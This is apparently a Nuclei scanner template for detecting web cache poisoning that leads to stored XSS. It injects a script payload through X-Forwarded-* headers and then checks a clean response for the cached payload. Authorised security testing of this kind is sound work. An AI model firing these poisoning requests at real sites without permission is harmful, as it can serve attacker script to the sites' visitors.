38 lines
1.0 KiB
YAML
38 lines
1.0 KiB
YAML
id: cache-poisoning-xss
|
|
|
|
info:
|
|
name: Cache Poisoning - Stored XSS
|
|
author: melbadry9,xelkomy,akincibor
|
|
severity: high
|
|
reference:
|
|
- https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
|
|
- https://portswigger.net/research/practical-web-cache-poisoning
|
|
- https://portswigger.net/web-security/web-cache-poisoning
|
|
tags: cache,generic,xss
|
|
metadata:
|
|
max-request: 2
|
|
|
|
variables:
|
|
cache_key: "{{to_lower(rand_base(6))}}"
|
|
cache_header: "{{to_lower(rand_base(6))}}"
|
|
xss_payload: '"></script><script>alert(document.domain);</script>'
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?{{cache_key}}=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
|
|
X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
|
|
X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
|
|
|
|
- |
|
|
GET /?{{cache_key}}=1 HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(body_2, cache_header)
|
|
- contains(body_2, xss_payload)
|
|
condition: and |